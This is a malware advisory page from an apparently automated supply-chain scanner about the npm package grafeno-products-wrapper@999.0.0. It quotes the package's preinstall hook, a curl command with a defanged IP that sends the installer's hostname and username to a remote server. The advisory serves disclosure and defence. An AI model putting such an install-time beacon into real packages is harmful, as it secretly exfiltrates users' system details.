LWA-2026-11686 confirmed malware

grafeno-products-wrapper@999.0.0

Malicious code in grafeno-products-wrapper (npm)

T1059 · Command and Scripting InterpreterT1082 · System Information DiscoveryT1071.001 · Web ProtocolsT1041 · Exfiltration Over C2 Channel

Analysis

The preinstall hook executes `curl -s hxxp://216[.]126[.]236[.]46:8080/rce?pkg=grafeno-products-wrapper&h=$(hostname)&u=$(whoami)`, contacting a remote server at IP 216[.]126[.]236[.]46:8080 (path /rce) and exfiltrating the installer's hostname and username at install time. The package is a minimal stub (a 25-byte index.js) whose only real behaviour is this install-time recon beacon to a raw-IP endpoint.

analyzed by
Leitwacht
first seen
Aug 28, 2026, 10:16 PM
analyzed
Aug 28, 2026, 10:16 PM

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.